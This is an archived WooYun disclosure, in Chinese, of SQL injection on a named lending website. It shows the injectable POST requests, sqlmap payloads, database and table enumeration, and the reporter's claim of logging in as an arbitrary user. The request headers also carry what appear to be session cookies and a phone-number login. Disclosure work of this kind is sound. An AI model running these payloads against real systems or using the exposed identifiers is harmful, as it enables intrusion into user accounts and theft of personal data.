乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-06: 细节已通知厂商并且等待厂商处理中 2016-04-06: 厂商已经确认,细节仅向厂商公开 2016-04-06: 厂商已经修复漏洞并主动公开,细节向公众公开
RT主站存在注入漏洞,泄露25000多条用户敏感数据。
一、注入点:1、maxLimit参数和minLimit参数:
POST /queryLoanTransfer HTTP/1.1Content-Length: 328Content-Type: application/x-www-form-urlencodedCookie: d3e5feae0a8c7b3e_1=2cf629b810faa989c0bd98a7e0a8ace8530fa861303e770a71928c8cd4ae8fa15254b4c934422755dd1da560cfc812095b3a8d0c925e7963d1275164c311c83f; Hm_lvt_466bbed2607a2b7a987635d0100b0cdb=1459935725; Hm_lpvt_466bbed2607a2b7a987635d0100b0cdb=1459935726; loginName_16897=18649803761; userCode_16897=f332189388914d6da199cd6fabf3880e; userName_16897=test555; _jfinal_captcha=91295400e18fabbca30c6a704cbd9a23; HMACCOUNT=A9B0A6E71CF9B056; __cuid=14599352980540950; __bc_last=1459935298054; navStatus_16897=3Host: www.yrhx.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*maxLimit=&minLimit=&pageNumber=1&pageSize=10
2、type参数:
POST /queryNewsByPage HTTP/1.1Content-Length: 175Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: https://www.yrhx.com:443/Host: www.yrhx.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*isContent=1&pageNumber=1&pageSize=5&type=
3、工具sqlmap注入结果:
sqlmap resumed the following injection point(s) from stored session:---Parameter: maxLimit (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: maxLimit=-7964 OR 7345=7345#&minLimit=&pageNumber=1&pageSize=10 Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: maxLimit=-8733 OR 1 GROUP BY CONCAT(0x7176627171,(SELECT (CASE WHEN (1516=1516) THEN 1 ELSE 0 END)),0x7162787871,FLOOR(RAND(0)*2)) HAVING MIN(0)#&minLimit=&pageNumber=1&pageSize=10 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: maxLimit=(SELECT (CASE WHEN (8160=8160) THEN SLEEP(5) ELSE 8160*(SELECT 8160FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&minLimit=&pageNumber=1&pageSize=10---do you want to exploit this SQL injection? [Y/n][18:28:46] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0.12
二、数据信息:1、所有数据库:
available databases [3]:[*] information_schema[*] test[*] yrhxdb
2、当前库yrhxdb中的表及数据量:
Database: yrhxdb+--------------------+---------+| Table | Entries |+--------------------+---------+| t_funds_trace | 1941831 || t_sms_log | 180224 || t_recharge_trace | 179947 || t_bizlog | 165616 || t_loan_trace | 141064 || tmp_tender | 134564 || t_withdraw_trace | 66073 || t_history_recy | 52032 || t_location | 46462 || t_funds | 25857 || t_user | 25857 || t_user_info | 25857 || t_banks | 13044 || t_auto_loan_v2 | 10216 || t_loan_transfer | 8596 || t_loan_info | 8501 || t_banks_v2 | 5593 || t_share | 5087 || tmp_user | 3563 || t_loan_apply | 645 || t_loan_notice | 564 || t_auto_loan | 560 || t_market_user | 173 || t_notice | 74 || t_auth_log | 58 || t_settlement_early | 58 || t_menu_v2 | 45 || t_op_user_v2 | 38 || tmp_xxs1 | 15 || t_tickets | 8 || t_market | 5 || t_sys_config | 5 || t_sys_funds | 1 || view_syscount | 1 |+--------------------+---------+
2、当前库中用户表中某些字段的数据(部分截图):
3、随便拿一个用户登录一下看看:
参数过滤
危害等级:高
漏洞Rank:20
确认时间:2016-04-06 22:33
已确认漏洞存在,非常感谢! 请联系我,有礼品!
2016-04-06:已加急处理了!
